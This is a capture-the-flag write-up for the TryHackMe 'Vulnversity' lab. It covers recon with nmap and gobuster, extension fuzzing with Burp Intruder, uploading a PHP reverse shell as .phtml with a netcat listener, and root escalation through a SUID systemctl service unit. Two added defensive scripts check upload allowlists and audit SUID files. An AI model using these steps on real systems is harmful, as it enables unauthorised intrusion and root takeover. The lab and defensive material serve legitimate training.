
Writeup for TryHackMe room - Vulnversity

Vulnversity

This room is about performing recon and web attacks.

For the complete TryHackMe path, refer to the link.

Tools Used

Enumeration

  • NMAP
  • Gobuster
  • Burpsuite

Exploitation

Task 2 - Reconnaissance

References

Using nmap as below, all the information needed for this task can be gathered.

nmap -Pn -T4 -sV --reason --open <ip>

Task 3 - Locating directories using Gobuster

References

Using gobuster with the dirb wordlist, find the child directories under the web root.

gobuster dir -u http://<ip>:3333 -w /usr/share/wordlists/dirb/common.txt -q

Use either curl or a browser to load each page from the gobuster result and check whether any of them contains upload logic.

curl http://<ip>:3333/<dir>/

Task 4 - Compromise the webserver

References

This task can be done using Burp Suite.

  • Open Firefox and set its proxy to 127.0.0.1:8080
  • Open Burp Suite and turn intercept on
  • Using the upload URL found previously, load http://<ip>:3333/<dir>/ in Firefox and upload a file
  • In Burp Suite's Proxy tab, select the intercepted request and send it to Intruder
  • In the Intruder tab, under Positions, select the Sniper attack type, clear the § markers, and add § around the filename extension
  • In the Intruder tab, under Payloads, load /usr/share/wordlists/SecLists/Fuzzing/extensions-most-common.fuzz.txt and start the attack
  • Check the results for a different response size to find which extensions are not blocked
  • Quit Burp Suite and revert the proxy setting in Firefox

Download the PHP reverse shell payload and save a copy of it with the .phtml extension. Edit the file and change the IP to the local machine's IP.

Start a netcat listener to wait for the reverse shell connection.

nc -lnvp 1234

Using the upload URL found previously, load http://<ip>:3333/<dir>/ in Firefox, upload the payload file, and then navigate to http://<ip>:3333/<dir>/uploads/php-reverse-shell.phtml. A reverse shell should now be connected in the netcat listener's terminal.

The user running the web server and the flag can be retrieved from the shell.
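The extension fuzzing above works because the upload form rejects a short denylist of extensions and lets everything else through, including .phtml, which the PHP handler still executes. The shell example below is added here and is not part of the original writeup or the room; it contrasts that denylist-style check with the allowlist-style check an upload handler should use. The accepted image extensions, the single rejected .php entry and the sample filenames are all constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original writeup): compare a denylist-style upload
# check with an allowlist-style check. The policy and filenames are constructed.

# denylist_ok NAME : the weak pattern the room's upload form behaves like,
# rejecting only names ending in ".php" and accepting anything else.
denylist_ok() {
    case "$1" in
        *.php) return 1 ;;
        *)     return 0 ;;
    esac
}

# allowlist_ok NAME : accept only a fixed set of image extensions, compared
# case-insensitively, and reject everything else, including names with no
# extension and names containing path components.
allowlist_ok() {
    name=$1
    case "$name" in
        */*|*..*|'') return 1 ;;          # no directories, traversal or empty names
    esac
    # Text after the final dot, lowercased; empty when there is no dot.
    ext=$(printf '%s' "$name" | sed -n 's/.*\.\([A-Za-z0-9]*\)$/\1/p' | tr 'A-Z' 'a-z')
    case "$ext" in
        jpg|jpeg|png|gif) return 0 ;;
        *)                return 1 ;;
    esac
}

# verdicts NAME : print how each check treats NAME, for example
# "php-reverse-shell.phtml denylist=accept allowlist=reject".
verdicts() {
    if denylist_ok "$1"; then d=accept; else d=reject; fi
    if allowlist_ok "$1"; then a=accept; else a=reject; fi
    printf '%s denylist=%s allowlist=%s\n' "$1" "$d" "$a"
}

# Demo over constructed filenames. The denylist accepts both "notes" and the
# .phtml name; the allowlist rejects both and only lets the image names through.
for n in photo.png photo.PNG notes php-reverse-shell.php php-reverse-shell.phtml; do
    verdicts "$n"
done
```

The point of the contrast: what actually executes is decided by the web server's handler mapping (on Debian-family Apache with mod_php the default handler matches .phtml as well as .php), so a denylist is only as complete as its author's knowledge of that mapping. An allowlist of the few types the application genuinely needs, combined with storing uploads outside the web root or serving them through a handler that never executes them, removes that dependency.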

Task 5 - Privilege Escalation

Now that the web server is compromised and shell access has been gained, this task shows how to escalate privileges using SUID.

Find the binaries which have the SUID bit set. Such a binary runs with the privileges of its owner (here root) no matter which user executes it, so a normal user can temporarily act as root through it. Either of the commands below lists the SUID binaries.

find / -perm /4000 2>&1 | grep -v "Permission denied"
find / -user root -perm -4000 -exec ls -ldb {} \;

Since the SUID binary found is /bin/systemctl, create a temporary service unit and run it through systemctl to execute a command as root.

eop=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $eop
/bin/systemctl link $eop
/bin/systemctl enable --now $eop

Capture the flag from the output file written by the service.

cat /tmp/output
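From the defender's side, the SUID step is the one to watch: /bin/systemctl is not SUID on a stock install, so a periodic comparison of the SUID set against a known-good baseline would flag it before it is abused. The shell example below is added here and is not part of the writeup or the room. It builds a constructed directory tree containing three SUID files, two that appear in a constructed baseline and a copy of systemctl that does not, and reports the unexpected one; on a live host the same function is run against /.

```shell
#!/bin/sh
# Added example (not from the original writeup): report SUID binaries that are
# not in a known-good baseline. The baseline and the demo tree are constructed.

# Constructed baseline of paths expected to be SUID, one per line. A real
# baseline is recorded from a freshly installed, trusted host.
SUID_BASELINE="/usr/bin/passwd
/usr/bin/sudo"

# list_suid ROOT : every regular file under ROOT with the setuid bit, sorted.
# -xdev stops at filesystem boundaries so /proc and network mounts are skipped.
list_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort
}

# unexpected_suid ROOT : SUID files under ROOT whose path, relative to ROOT,
# is not an exact line of SUID_BASELINE.
unexpected_suid() {
    root=$1
    list_suid "$root" | while IFS= read -r f; do
        rel=${f#"$root"}                         # strip the tree prefix
        case "$rel" in /*) ;; *) rel=/$rel ;; esac   # keep a leading slash (ROOT=/ case)
        if ! printf '%s\n' "$SUID_BASELINE" | grep -Fxq -- "$rel"; then
            printf '%s\n' "$rel"
        fi
    done
}

# make_demo_tree : build a constructed tree with two expected SUID files, one
# unexpected SUID copy of systemctl (as in the room) and one normal file, and
# print the tree's path.
make_demo_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin" "$d/bin"
    for f in usr/bin/passwd usr/bin/sudo bin/systemctl bin/ls; do
        : > "$d/$f"
    done
    chmod 4755 "$d/usr/bin/passwd" "$d/usr/bin/sudo" "$d/bin/systemctl"
    chmod 0755 "$d/bin/ls"
    printf '%s\n' "$d"
}

# Demo on the constructed tree; on a live host run: unexpected_suid /
demo=$(make_demo_tree)
echo "SUID files under $demo:"
list_suid "$demo"
echo "Not in baseline:"
unexpected_suid "$demo"
rm -rf "$demo"
```

Anything the audit reports is either a legitimate addition to record in the baseline or a bit to clear with chmod u-s and then investigate; a SUID systemctl is in the second group, because it hands any local user the ability to start arbitrary units as root, which is exactly what Task 5 exploits.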